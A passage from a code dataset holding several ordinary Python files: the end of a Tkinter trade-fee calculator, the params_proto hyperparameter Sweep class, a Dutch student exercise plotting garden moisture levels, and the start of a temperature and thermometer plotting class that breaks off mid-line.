Number of shares\", \n            command=lambda:self.calNumShares(self.investiableEntry.get(),self.unitSharePriceEntry.get()))\n\n        self.buttoncalInvestAmt = ttk.Button(window, text=\"Calculate Investable amount\",\n            command=lambda:self.calInvestAmt(self.shareNumberEntry.get(),self.unitSharePriceEntry.get()))\n\n        self.buttoncalCommissionAmt = ttk.Button(window, text=\"Calculate Total Commission amount\", \n            command=lambda:self.calCommissionAmt(self.shareNumberEntry.get(),self.shareCommissionEntry.get(),self.fixedCommissionEntry.get()))\n        \n        self.buttoncalTotalinvestCost = ttk.Button(window, text=\"Calculate Total Invested Plus Fee Cost\", \n            command=lambda:self.calTotalinvestCost(self.investiableEntry.get(),self.totalCommissionEntry.get()))\n\n        self.buttoncalTotalinvestCostOneStep = ttk.Button(window, text=\"Calculate Total Invested Plus Fee Cost 1 step\", \n            command=lambda:self.calTotalinvestCostOneStep(self.investiableEntry.get(),self.unitSharePriceEntry.get()))\n\n        self.buttondelete=ttk.Button(window,text='Clear',width=10, command=lambda:self.clear())\n        \n        self.balanceLabel.pack()\n        
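# Layout note: tk pack() defaults to side='top', so each label/entry pair\n        # below stacks vertically in the order it is packed.\n        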
self.balanceEntry.pack()\n\n        self.investiableLabel.pack()\n        self.investiableEntry.pack()\n        \n        self.unitSharePriceLabel.pack()\n        self.unitSharePriceEntry.pack()\n        \n\n        self.shareNumberLabel.pack()\n        self.shareNumberEntry.pack()\n\n        self.shareCommissionLabel.pack()\n        self.shareCommissionEntry.pack()\n\n        self.fixedCommissionLabel.pack()\n        self.fixedCommissionEntry.pack()\n\n        self.totalCommissionLabel.pack()\n        self.totalCommissionEntry.pack()\n\n        self.totalInvestedCostLabel.pack()\n        self.totalInvestedCostEntry.pack()\n\n        self.balanceAfterLabel.pack()\n        self.balanceAfterEntry.pack()\n\n        # self.buttoncalNumShares.pack()\n        # self.buttoncalInvestAmt.pack()\n        # self.buttoncalCommissionAmt.pack()\n        # self.buttoncalTotalinvestCost.pack()\n        self.buttoncalTotalinvestCostOneStep.pack()\n        self.buttondelete.pack()\n\n    def calNumShares(self, investamount,shareUnitPrice):\n        result=float(investamount)/float(shareUnitPrice)\n        self.shareNumberEntry.delete(0,END)\n        self.shareNumberEntry.insert(0,result)\n        print(result)\n    \n    def calInvestAmt(self, shareNumber, shareUnitPrice):\n        result=float(shareNumber)*float(shareUnitPrice)\n        self.investiableEntry.delete(0,END)\n        self.investiableEntry.insert(0,result)\n        print(result)\n    \n    def calCommissionAmt(self, shareNumber, shareCommission, fixedCommissionAmt):\n        result=float(shareNumber)*float(shareCommission)+float(fixedCommissionAmt)\n        self.totalCommissionEntry.delete(0,END)\n        self.totalCommissionEntry.insert(0,result)\n        print(result)\n    \n    def calTotalinvestCost(self, investAmt, totalCommissionAmt):\n        result=float(investAmt)+float(totalCommissionAmt)\n        self.totalInvestedCostEntry.delete(0,END)\n        self.totalInvestedCostEntry.insert(0,result)\n        print(result)\n\n    def calTotalinvestCostOneStep(self,investamount,shareUnitPrice):\n        shareNum=float(investamount)/float(shareUnitPrice)\n        self.shareNumberEntry.delete(0,END)\n        self.shareNumberEntry.insert(0,shareNum) \n        commissionAmt=shareNum*float(self.shareCommissionEntry.get())+float(self.fixedCommissionEntry.get()) \n        result=commissionAmt+float(investamount)\n        balance = float(self.balanceEntry.get()) - result\n        self.totalCommissionEntry.delete(0,END)\n        self.totalCommissionEntry.insert(0,commissionAmt)\n        self.totalInvestedCostEntry.delete(0,END)\n        self.totalInvestedCostEntry.insert(0,result)\n        self.balanceAfterEntry.delete(0,END)\n        self.balanceAfterEntry.insert(0,balance)\n        print(result)\n\n    def clear(self):\n        self.shareNumberEntry.delete(0,END)\n        self.unitSharePriceEntry.delete(0,END)\n        self.investiableEntry.delete(0,END)\n        self.totalInvestedCostEntry.delete(0,END)\n        self.totalCommissionEntry.delete(0,END)\n        self.balanceEntry.delete(0,END)\n        self.balanceAfterEntry.delete(0,END)\n\ndef main():\n    rootwindow=Tk() \n    windowUI=GUI(rootwindow)\n    rootwindow.mainloop()\n\nif __name__ == '__main__': main()\n\n\n","repo_name":"mdzapeer/TradeFeeCalculator","sub_path":"tradefeecalc.py","file_name":"tradefeecalc.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29330106810","text":"import itertools\nfrom collections import namedtuple, defaultdict\nfrom contextlib import contextmanager\nfrom typing import TypeVar, ContextManager, Iterable, Union, Dict\n\nfrom params_proto.proto import Meta, ParamsProto, Proto\n\n\ndef dot_join(*keys):\n    \"\"\"Join the non-empty keys with '.'; returns None if nothing remains.\"\"\"\n    _ = [k for k in keys if k]\n    if not _:\n        return None\n    return \".\".join(_)\n\n\nItem = namedtuple('Item', ['key', 'value'])\n\n\ndef key_items(d, 
prefix=None):\n    \"\"\"\n    Takes in tuples of [key, value], or [None, [[key, value], ...]]\n    yields, for each key, its values wrapped as Items under the dot-joined\n    key (raw values when the joined key is empty)\n    \"\"\"\n    for k, vs in d:\n        _ = dot_join(prefix, k)\n        yield [Item(_, v) if _ else v for v in vs]\n\n\ndef flatten_items(row) -> Iterable[Item]:\n    if isinstance(row, Item):\n        yield row\n    elif isinstance(row, Iterable):\n        for item in row:\n            yield from flatten_items(item)\n    else:\n        yield row\n\n\nT = TypeVar('ParamsProto')\n\n\nclass Sweep:\n    _d = None\n    __original = None\n    __noot = None\n\n    __each_fn = None\n\n    def each(self, fn):\n        self.__each_fn = fn\n        return self\n\n    # noinspection PyProtectedMember\n    def __init__(self, *protos: Meta):\n        # the ParamsProto is updatable via proto._update(dot_dict)\n        # use object itself as key if _prefix is missing\n        self.root: Dict[str, ParamsProto] = {p._prefix or p: p for p in protos}\n        self.stack = [[]]\n\n    def __len__(self):\n        return len(self.list)\n\n    def __getitem__(self, item: Union[slice, int, float]):\n        if isinstance(item, slice):\n            assert item.step != 0, \"step can not be zero.\"\n            if (item.start and item.start < 0) or (item.stop and item.stop < 0) or (item.step and item.step < 0):\n                for override in self.list[item]:\n                    for org, proto in zip(self.original, self.noot.values()):\n                        proto._update(**org)\n                        proto._update(override)\n                    yield override\n                return\n            for i, el in enumerate(self):\n                if item.start is not None and i < item.start:\n                    continue\n                if item.step is None or (i - (item.start or 0)) % item.step == 0:\n                    yield el\n                if item.stop is None:\n                    continue\n                if i >= item.stop - 1:\n                    break\n        elif isinstance(item, int):\n            # need-test: Not tested from a quick glance.\n            if item < 0:\n                for override in self.list[item]:\n                    for org, proto in zip(self.original, self.noot.values()):\n                        proto._update(**org)\n                        proto._update(override)\n                    yield override\n            for i, el in enumerate(self):\n                if i == item:\n                    for org, proto in zip(self.original, self.noot.values()):\n                        proto._update(**org)\n                        proto._update(el)\n                    yield el\n                    break\n        else:\n            raise NotImplementedError(f\"slicing is not implemented for {item}\")\n\n    def items(self):\n        return enumerate(self)\n\n    @property\n    def list(self):\n        \"\"\"returns self as a list. Currently not idempotent. 
Might become idempotent in the future.\"\"\"\n        return [*iter(self)]\n\n    @property\n    def dataframe(self):\n        import pandas as pd\n        return pd.DataFrame(self.list)\n\n    @property\n    def __dict__(self):\n        if self._d:\n            return self._d\n        self._d = defaultdict(list)\n        for config in self:\n            for k, v in config.items():\n                self._d[k].append(v)\n        return self._d\n\n    @property\n    def noot(self):\n        from copy import deepcopy\n        return deepcopy(self.root)\n\n    @property\n    def snack(self):\n        from copy import deepcopy\n        return deepcopy(self.stack)\n\n    def __enter__(self):\n        self.stack.append([])\n        for proto in self.root.values():\n            data = {}\n\n            def set_hook(_, k, v, p=proto._prefix):\n                # note: we wrap this value in Proto, so that we can distinguish\n                #  between true None vs a None value set by the user.\n                data[k] = Proto(v)\n                return self.set_param(k, [v], prefix=p)\n\n            def get_hook(_, k, p=proto._prefix):\n                # note: This is used internally in the ParamsProto class, to decide on\n                #  override without key string filtering, which is prone to errors.\n                return data.get(k, None)\n\n            proto._add_hooks(set_hook, get_hook)\n\n        return self\n\n    def __exit__(self, *args):\n        for proto in self.root.values():\n            proto._pop_hooks()\n\n        frame = self.stack.pop(-1)\n        result = itertools.product(*key_items(frame))\n        self.set_param(None, result)\n\n    @property\n    def original(self):\n\n        if self.__original is None:\n            self.__original = []\n            for proto in self.noot.values():\n                # noinspection PyCallByClass\n                def no_reset(k):\n                    return getattr(type.__getattribute__(proto, k), \"accumulant\", False)\n\n                self.__original.append({k: v\n                                        for k, v in vars(proto).items()\n                                        if not no_reset(k)})\n        return self.__original\n\n    def __iter__(self):\n        for row in itertools.chain(*[it.value for it in self.snack[-1]]):\n            override = dict(flatten_items(row))\n            for org, proto in zip(self.original, self.noot.values()):\n                proto._update(**org)\n                # only apply those key-value pairs that appear in the original.\n                proto._update(override if proto._prefix else {k: v for k, v in override.items() if k in org})\n\n            if callable(self.__each_fn):\n                with Sweep(*self.noot.values()) as sweep:\n                    self.__each_fn(*self.noot.values())\n                for deps in sweep:\n                    yield {k: v for k, v in itertools.chain(override.items(), deps.items())}\n            else:\n                yield override\n\n    def set_param(self, name, params, prefix=None):\n        item = Item(dot_join(prefix, name), params)\n        self.stack[-1].append(item)\n\n    @property\n    @contextmanager\n    def product(self) -> ContextManager[None]:\n        self.stack.append([])\n        try:\n            for proto in self.root.values():\n                prefix = proto._prefix\n                proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n            yield self\n        finally:\n            for proto in self.root.values():\n                proto._pop_hooks()\n\n            frame = self.stack.pop(-1)\n            result = itertools.product(*key_items(frame))\n            self.set_param(None, result)\n\n    @property\n    @contextmanager\n    def zip(self) -> ContextManager[T]:\n        self.stack.append([])\n        try:\n            for proto in self.root.values():\n                prefix = proto._prefix\n                proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n            yield self\n        finally:\n            for proto in self.root.values():\n                proto._pop_hooks()\n\n            frame = self.stack.pop(-1)\n            result = list(zip(*key_items(frame)))\n            self.set_param(None, result)\n\n    @property\n    @contextmanager\n    def set(self) -> ContextManager[T]:\n        try:\n            yield self.__enter__()\n        finally:\n            self.__exit__()\n\n    @property\n    @contextmanager\n    def chain(self) -> ContextManager[T]:\n        self.stack.append([])\n        try:\n            for proto in self.root.values():\n                prefix = 
proto._prefix\n                proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n            yield self\n        finally:\n            for proto in self.root.values():\n                proto._pop_hooks()\n\n            frame = self.stack.pop(-1)\n            result = itertools.chain(*(value for k, value in frame))\n            self.set_param(None, result)\n\n    def save(self, filename=\"sweep.jsonl\", overwrite=True, verbose=True):\n        import json\n        from termcolor import colored as c\n        # todo: connect to ml-logger to setup managed sweep\n        with open(filename, 'w' if overwrite else 'a+') as f:\n            for item in self.list:\n                f.write(json.dumps(item) + '\\n')\n\n        if verbose:\n            import os\n            from urllib import parse\n\n            print(\n                c(\"saved\", \"blue\"),\n                c(len(self.list), \"green\"),\n                c(\"items to\", \"blue\"),\n                filename,\n                \".\",\n                # this is to show file path in console.\n                \"file://\" + parse.quote(os.path.realpath(filename))\n            )\n\n    @staticmethod\n    def log(deps, filename):\n        \"\"\"append deps object to a JSONL log file, used as a helper function\"\"\"\n        import json\n        with open(filename, 'a+') as f:\n            f.write(json.dumps(deps) + '\\n')\n\n    @staticmethod\n    def read(filename):\n        \"\"\"Read JSONL log files, used as a helper function\"\"\"\n        import json\n        sweep = []\n        with open(filename, 'r') as f:\n            line = f.readline().strip()\n            while line:  # need to handle end of line\n                if not line.startswith(\"//\"):\n                    sweep.append(json.loads(line.strip()))\n                line = f.readline().strip()\n        return sweep\n\n    file = None\n\n    def load(self, file=\"sweep.jsonl\", strict=True, silent=False):\n        \"\"\"\n        Loading sweep state from a jsonl file:\n\n        Note: **Important Caveat** When multiple prefix-free ParamsProto objects are present,\n            we sweep through all of the proto objects and set the attribute on the first\n            proto with the correct key. This first-attr approach works because the ParamsProto\n            object also generates argparse parameters, which means repetitive arguments are\n            not possible.\n            ~\n            However, this would fail in cases where attributes are dynamically added to an\n            argument object. The `sweep.jsonl` file loses this type of information, therefore\n            there is no way to recover such attributes. 
So the user should try to\n            either use PrefixProto, or explicitly define the attributes.\n\n        Usage Pattern 1: Loading from a file\n\n            sweep = Sweep(Args, RUN).load('sweep.jsonl')\n            for i, deps in enumerate(sweep):\n                assert RUN.job_id == i + 1, \"the job_id in that sweep.json should be 1-based.\"\n\n        Usage Pattern 2: Loading from a sweep list object or a pandas DataFrame\n\n            sweep_list = Sweep.read('sweep.jsonl')\n            sweep = Sweep(Args, RUN).load(sweep_list)\n            for i, deps in enumerate(sweep):\n                assert RUN.job_id == i + 1, \"the job_id in that sweep.json should be 1-based.\"\n\n        \"\"\"\n        import pandas as pd\n        from termcolor import colored\n\n        self.file = file\n\n        if isinstance(file, str):\n            file = self.read(file)\n        if isinstance(file, list):\n            df = pd.DataFrame(file)\n        elif isinstance(file, pd.DataFrame):\n            df = file\n        else:\n            raise TypeError(f\"{type(file)} is not supported\")\n\n        with self.zip:\n            for full_key in df:\n                prefix, *keys = full_key.split('.')\n                if prefix in self.root:\n                    proto = self.root[prefix]\n                    if not hasattr(proto, keys[0]):\n                        if strict:\n                            raise KeyError(f'{proto} does not contain the key \"{prefix}.{keys[0]}\"')\n                        if not silent:\n                            print(colored(f'{proto} does not contain the key \"', \"red\") +\n                                  colored(f'{full_key}', \"green\") +\n                                  colored(f'\" ', \"red\"))\n\n                    setattr(proto, '.'.join(keys), df[full_key].values.tolist())\n                else:\n                    for k, proto in self.root.items():\n                        if isinstance(k, str):\n                            continue\n                        if hasattr(proto, prefix):\n                            setattr(proto, full_key, df[full_key].values.tolist())\n                            break\n                    else:\n                        if strict:\n                            raise KeyError(f'The key \"{full_key}\" does not appear in any of the Arguments')\n                        if not silent:\n                            print(\n                                colored(f'The key \"', \"red\") +\n                                colored(f'{full_key}', \"green\") +\n                                colored(f'\" ', \"red\") +\n                                colored(f'does not appear in any of the Arguments', \"red\")\n                            )\n        return self\n","repo_name":"geyang/params-proto","sub_path":"params_proto/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":13088,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"}
+{"seq_id":"40409824149","text":"from datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom moistureReadings import moisture_levels1, moisture_levels2, moisture_levels3\n\n\"\"\"\nASSIGNMENT:\n\nYour neighbour has no green fingers but absolutely loves beautiful gardens. His plants always die because he\ndoes not know how much and when he should water them. 
He has therefore decided to buy\na system that measures the moisture levels in his garden, so that he knows better where and how much to water it.\nThe problem is that this system only produces numbers, and the neighbour does not really know what to do with them.\nBecause you are a good neighbour, you are helping him out.\n\nYou are given the measurement values; they are called moisture_levels1, moisture_levels2, moisture_levels3\nand they live in the other Python file, NO PEEKING.\n\nTIP: you may find the following numpy and matplotlib functions useful.\n\n- plt.imshow\n- plt.colorbar\n- plt.title\n- plt.grid\n- plt.xlim\n- plt.ylim\n- plt.show\n- plt.scatter\n\nTASK 1: visualize the measurements with a function makeGraph.\nTASK 2: retrieve the locations of the dry spots and print them with a function get_locations.\nBONUS TASK 3: draw circles on the map around the dry spots.\nBONUS TASK 4: turn the moisture reading into a class with the variables reading and date,\nand the functions makeGraph and get_locations. THIS ONE IS ONLY FOR GROUPS THAT HAVE ALREADY COVERED CLASSES!!\n\nStep-by-step plan:\n1. Import the required modules, in this case matplotlib.pyplot and numpy\n\n\"\"\"\n\n\nclass MoistureReading:\n    def __init__(self, reading, date):\n        self.reading = reading\n        self.date = date\n        self.locations = self.get_locations()\n\n    def makeGraph(self):\n        plt.imshow(self.reading, cmap='viridis')\n        plt.colorbar()\n        plt.title(f'Moisture Levels in the Garden ({self.date})', fontweight=\"bold\")\n        plt.grid(color='black', linestyle='--', linewidth=0.5)\n        plt.xlim(0, 20)\n        plt.ylim(0, 20)\n        for loc in self.locations:\n            plt.scatter(loc[1], loc[0], s=400, facecolors='none', edgecolors='r')\n        plt.show()\n\n    def get_locations(self):\n        locations = np.argwhere(self.reading < 10)\n        return np.array(locations)\n\n\nreading1 = MoistureReading(moisture_levels1, datetime(2023, 1, 1))\nreading2 = MoistureReading(moisture_levels2, datetime(2023, 1, 2))\nreading3 = MoistureReading(moisture_levels3, datetime(2023, 1, 3))\n\nreading1.makeGraph()\nprint(reading1.locations)\n\nreading2.makeGraph()\nprint(reading2.locations)\n\nreading3.makeGraph()\nprint(reading3.locations)","repo_name":"Richard-H12/Learning","sub_path":"les6_uitwerkingen.py","file_name":"les6_uitwerkingen.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"38243128686","text":"#!/bin/python37\n\n##\n## By Julia Engdahl 09/08/2020\n## Modified by Elim Thompson 09/09/2020\n##\n## This script is only a class and should not be called by itself. To use\n## this library, check out plot_data.py\n##\n## Julia's original script ddp_plots.py:\n## This script contains functions to generate water level, temperature, wind,\n## pressure plots and to concatenate them into GIFs. \n##  * water level: time-series with prediction and observation\n##  * temperature: both water and air temp as time-series and thermometers\n##  * wind       : polar plot (i.e. no time-series)\n##  * pressure   : time-series with a barometer\n##\n## Elim's modification:\n##  * Turned ddp_plots.py into a product class and its children\n##  * Added ability to do both time-series + object and object alone\n##############################################################################\n\n###############################################\n## Import libraries\n###############################################\nimport requests, pytz, glob, os, sys\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom . 
import product\n\nimport matplotlib\nmatplotlib.use ('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.colors import LightSource\nplt.rc ('text', usetex=False)\nplt.rc ('font', family='sans-serif')\nplt.rc ('font', serif='Computer Modern Roman')\n\n###############################################\n## Define constants\n###############################################\n## Monitor dpi\nDPI = product.DPI\n\n## Number of continuous bad data to trigger no-plot-shown\nN_HOURS_NULL_DATA = product.N_HOURS_NULL_DATA\n\n## Time format for display\nTIME_FORMAT = '%m/%d/%Y %I:%M %p'\nCURRENT_TIME_LABEL = 'Current Time'\n\n## For plotting style\nXTICKLABEL_TIME_FORMAT = product.XTICKLABEL_TIME_FORMAT\nXTICKLABEL_HOURS = product.XTICKLABEL_HOURS\nN_YTICKS = product.N_YTICKS\n\n## For temperature\nTEMP_BULB_RADIUS = 6\nTEMP_TUBE_SCALE = 60\nTEMP_TUBE_HEIGHT = TEMP_TUBE_SCALE + 3 # Tube is slightly taller\n# Position of air and water thermometer on time-series plot\n# [x-coordinate (lower left), y-coordinate (lower left), width, height]\nTEMP_AIR_THERMO_POS = [0.0, 0.0, 0.4, 1]\nTEMP_WATER_THERMO_POS = [0.5, 0.0, 0.4, 1]\nTEMP_SCALE_PAD = 20\n\n###############################################\n## Define short lambda functions\n###############################################\nconvert_defF_to_defC = lambda degF: (degF - 32) * 5/9\n\n###############################################\n## Define temperature child class\n###############################################\nclass temperature (product.product):\n\n    def __init__ (self):\n\n        ''' To initialize a temperature product instance '''\n\n        super().__init__('temperature')\n\n        ## Thermometer parameters\n        self._tube_scale = TEMP_TUBE_SCALE\n        self._tube_height = TEMP_TUBE_HEIGHT\n        self._bulb_radius = TEMP_BULB_RADIUS\n        self._scale_pad = TEMP_SCALE_PAD\n\n        # For time-series plot specifically\n        self._air_thermo_pos = TEMP_AIR_THERMO_POS\n        self._water_thermo_pos = TEMP_WATER_THERMO_POS\n\n    def __repr__ (self):\n        pass\n\n    # +------------------------------------------------------------\n    # | Getters & setters\n    # +------------------------------------------------------------ \n    @property\n    def latest_obs (self): return self.latest_air_temp\n\n    @property\n    def latest_obs_time (self):\n        if self._latest_data_df is None: return None\n        not_na = ~self._latest_data_df.air.isna()\n        return self._latest_data_df.air.index[not_na][-1]\n\n    @property\n    def latest_air_temp (self):\n        if self._latest_data_df is None: return None\n        not_na = ~self._latest_data_df.air.isna()\n        return self._latest_data_df.air.values[not_na][-1]\n\n    @property\n    def latest_water_temp (self):\n        if self._latest_data_df is None: return None\n        not_na = ~self._latest_data_df.water.isna()\n        return self._latest_data_df.water.values[not_na][-1]\n\n    @property\n    def has_all_nan (self):\n        ## If dataframe is None -> no past data\n        if self._latest_data_df is None: return False\n        ## Slice out observed data from N hours before obs time\n        begin_time = self.latest_obs_time - pd.offsets.Hour (N_HOURS_NULL_DATA)\n        end_time = self.latest_obs_time\n        observed = self._latest_data_df.loc[begin_time:end_time,].air\n        ## Check if all observed data in this time window is invalid\n        return observed.isna().all()\n\n    @property \n    def min_temp (self):\n        if self._latest_data_df is None: return None\n        return self._latest_data_df.loc[:, ['air', 'water']].min().min()\n\n    @property \n    def max_temp (self):\n        if self._latest_data_df is None: return None\n        return 
self._latest_data_df.loc[:, ['air', 'water']].max().max()\n\n @property\n def tube_scale (self): return self._tube_scale\n @tube_scale.setter\n def tube_scale (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Tube Scale must be >= 0.')\n self._tube_scale = number\n\n @property\n def tube_height (self): return self._tube_height\n @tube_height.setter\n def tube_height (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Tube Height must be >= 0.')\n self._tube_height = number\n\n @property\n def bulb_radius (self): return self._bulb_radius\n @bulb_radius.setter\n def bulb_radius (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Bulb radius must be >= 0.')\n self._bulb_radius = number\n\n @property\n def scale_pad (self): return self._scale_pad\n @scale_pad.setter\n def scale_pad (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Padding between tick and scale must be >= 0.')\n self._scale_pad = number\n\n @property\n def air_thermo_pos (self): return self._air_thermo_pos\n @air_thermo_pos.setter\n def air_thermo_pos (self, array):\n ## Make sure input is a number array with 4 values\n self._check_is_array (array, length=4)\n ## Make sure the elements are numbers\n for elem in array: self._check_is_number (elem) \n self._air_thermo_pos = array\n\n @property\n def water_thermo_pos (self): return self._water_thermo_pos\n @water_thermo_pos.setter\n def water_thermo_pos (self, array):\n ## Make sure input is a number array with 4 values\n self._check_is_array (array, length=4)\n ## Make sure the elements are numbers\n for elem in array: self._check_is_number (elem) \n self._water_thermo_pos = array\n\n # +------------------------------------------------------------\n # | Collect & handle temp data\n # +------------------------------------------------------------\n def _normalize_temperature (self, temp):\n\n tmin = self.min_temp - 5\n tmax = self.max_temp + 5\n return (temp - tmin) / (tmax - tmin) * self._tube_scale\n\n def _load_data (self):\n\n ## Make sure \"now\" time is set\n if self._now is None:\n raise IOError (\"Please define now time before loading data.\")\n\n ## Get 6-min air temp observation time-series: v, f\n air_df = self._load_latest(product_name = 'air_temperature')\n air_df = air_df.drop(axis=1, columns=['f'])\n air_df.columns = ['air']\n\n ## Get 6-min water temp observation time-series: v, f\n water_df = self._load_latest(product_name = 'water_temperature')\n water_df = water_df.drop(axis=1, columns=['f'])\n water_df.columns = ['water']\n\n ## Merge two into one\n obs_df = pd.merge (air_df, water_df, right_index=True, left_index=True, how='outer')\n\n ## Go through each column to convert them to float type\n obs_df['air'] = obs_df.air.astype (float)\n obs_df['water'] = obs_df.water.astype (float)\n self._latest_data_df = obs_df\n\n ## Convert temperature to tube height\n obs_df['air_height'] = self._normalize_temperature (obs_df.air)\n obs_df['water_height'] = self._normalize_temperature (obs_df.water)\n\n ## Add in extra hours with nan temp for time-series plots\n end_date = self.now + pd.offsets.Hour (self._hours_pad[1])\n 
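# Append a single NaN row at now + hours_pad[1]; the asfreq('6min') call below\n        # then fills the gap, extending the plotted x-axis past the newest observation\n        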
obs_df.loc[end_date.strftime('%Y-%m-%d %H:%M:%S')] = \\\n pd.Series ([np.NaN]*len (obs_df.columns), obs_df.columns)\n obs_df = obs_df.asfreq ('6min')\n\n ## Store it as internal variable\n self._latest_data_df = obs_df\n\n # +------------------------------------------------------------\n # | Plot functions\n # +------------------------------------------------------------\n def _plot_obs_time_series (self, axis, df, dot_time, ylimits,\n yticks, yticklabels, ylabel):\n\n # Define data to be plotted up to dot-time\n valid_points = np.logical_or (~df.air.isna(), ~df.water.isna())\n before_dot_obs = df[np.logical_and (df.index <= dot_time, valid_points)]\n latest_obs = before_dot_obs.tail(1)\n\n # 1. Plot air temp observation up to dot time\n axis.plot(before_dot_obs.index, before_dot_obs.air, c='red',\n label='Air temperature', linewidth=self._linewidth)\n # Add red dot for air temp \n axis.scatter (latest_obs.index[0], latest_obs['air'][0], c='red',\n s=self._markersize, alpha=0.7)\n\n # 2. Plot water temp observation up to dot time\n axis.plot(before_dot_obs.index, before_dot_obs.water, c='blue',\n label='Water temperature', linewidth=self._linewidth)\n # Add blue dot for water temp \n axis.scatter (latest_obs.index[0], latest_obs['water'][0], c='blue',\n s=self._markersize, alpha=0.7)\n\n # 3. Add vertical line for recent data time in LST/LDT\n axis.axvline (self._now.strftime ('%Y-%m-%d %H:%M'), color='green',\n label=CURRENT_TIME_LABEL, linewidth=self._linewidth)\n\n # 4. Format x-axis based on hours-pad\n axis.set_xlim(df.index[0], df.index[-1])\n xticks = df.index [np.logical_and (df.index.hour.isin (XTICKLABEL_HOURS), df.index.minute==0)] \n axis.set_xticks (xticks)\n xticklabels = [x.strftime (XTICKLABEL_TIME_FORMAT) for x in xticks]\n axis.set_xticklabels (xticklabels, rotation=25, fontsize=self._fontsize)\n axis.set_xlabel('Date time', fontsize=self._fontsize, labelpad = 23)\n \n # 5. Format y-axis\n axis.set_ylim (ylimits)\n axis.set_yticks (yticks)\n yticklabels = ['{0:.1f}'.format (y) for y in yticklabels]\n axis.set_yticklabels (yticklabels, fontsize=self._fontsize)\n axis.set_ylabel (ylabel, fontsize=self._fontsize, labelpad = 23)\n \n # 6. Add grid lines\n for ytick in axis.get_yticks():\n axis.axhline (y=ytick, color='gray', alpha=0.7, linestyle=':', linewidth=1.0)\n for xtick in axis.get_xticks():\n axis.axvline (x=xtick, color='gray', alpha=0.7, linestyle=':', linewidth=1.0)\n\n def _create_a_thermometer_on_main_axis (self, axis, temp_height, yticks, \n isAir=False):\n \n ## Define constants based on air or water thermometers\n color = '#f94f60' if isAir else '#007bae'\n rect = self._air_thermo_pos if isAir else self._water_thermo_pos\n\n ## Create a new matplotlib figure and map the coordinate with main axis\n fig = plt.gcf()\n box = axis.get_position()\n width, height = box.width, box.height\n inax_position = axis.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n\n ## Remove rectangle grid\n axis.axis ('off')\n\n ## Create a sub-axis in the rectangle defined\n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3]\n subax = fig.add_axes([x,y,width,height])\n\n ## Create a thermometer in the sub-axis\n self._create_a_thermometer (subax, temp_height, yticks, color, isAir=isAir)\n \n def _create_a_thermometer (self, axis, height, yticks, color, isAir=False):\n\n ## Format x & y axes\n # 1. x-axis centered at (0,0) i.e. 
center of bulb with a radius of 6\n        axis.set_xlim (-10,10)\n        # 2. y-axis ends at tube height\n        axis.set_ylim (-10, self._tube_height)\n        # Normalize input yticks to be within tube scale\n        normalized_yticks = [(y-min(yticks)) / (max(yticks)-min(yticks))*self._tube_scale\n                             for y in yticks]\n        axis.set_yticks (normalized_yticks)\n        \n        ## Format spines \n        axis.spines['top'].set_visible(False)\n        axis.spines['right'].set_visible(False)\n        axis.xaxis.set_ticks([])\n        axis.spines['bottom'].set_color('none') \n\n        ## Show scale only if air thermometer\n        if isAir: \n            # Show left spine\n            axis.yaxis.set_ticks_position('left')\n            # Define y ticklabels to be the same as main plot (instead of tube scale)\n            ylabels = ['{0:.0f}$^\circ$F'.format (y) for y in yticks]\n            axis.set_yticklabels (ylabels, fontsize=self._fontsize-7)\n            # Format the spine line and ticks\n            axis.spines['left'].set_linewidth(3)\n            axis.tick_params(axis='y', width=2, length=10, pad=self._scale_pad)\n        else:\n            # Do not show left spine\n            axis.yaxis.set_ticks([])\n            axis.spines['left'].set_color('none') \n        \n        ## Draw the tube as a patch, with round corners, aligned with bulb's center\n        tube_width = self._bulb_radius + 1\n        tube_loc = (-1 *tube_width / 2, 0)\n        tube = matplotlib.patches.FancyBboxPatch (tube_loc, tube_width, self._tube_height,\n                                                  linewidth=3, edgecolor=color, facecolor='none',\n                                                  boxstyle=\"round,pad=0,rounding_size=3.5\",\n                                                  capstyle='round', joinstyle=\"round\")\n        ## Anchor this tube patch to this thermometer subplot\n        axis.add_patch (tube)\n\n        ## Draw the bulb as a patch centered at (0, 0) \n        circle = plt.Circle ((0, 0), radius=self._bulb_radius, color=color)\n        axis.add_patch (circle)\n        \n        ## Write temp type in the bulb with shadow\n        tempType = 'Air' if isAir else 'Water'\n        axis.annotate (tempType, xy=(0.1, -0.2), fontsize=self._fontsize-3,\n                       ha=\"center\", va=\"center\", color='#E8E8E8')\n        axis.annotate (tempType, xy=(0, 0), fontsize=self._fontsize-3,\n                       ha=\"center\", va=\"center\", color='black')\n        \n        ## Fill in data in tube with data at dot-time\n        if np.isfinite (height):\n            # Create a new tube up to the current temperature\n            tube = matplotlib.patches.FancyBboxPatch (tube_loc, tube_width, height,\n                                                      linewidth=3, facecolor=color, edgecolor=color)\n            axis.add_patch (tube)\n\n        return axis\n\n    def _generate_one_plot (self, dot_time, doMetric=False):\n\n        ## Make sure df time is set\n        df = self._latest_data_df\n        if df is None: raise IOError (\"Please load data before plotting.\") \n        \n        ## Define the unit - either degF or degC\n        yunit = '$^\circ$C' if doMetric else '$^\circ$F'\n        \n        ## Create a huuuge canvas with 2 subplots.\n        fig = 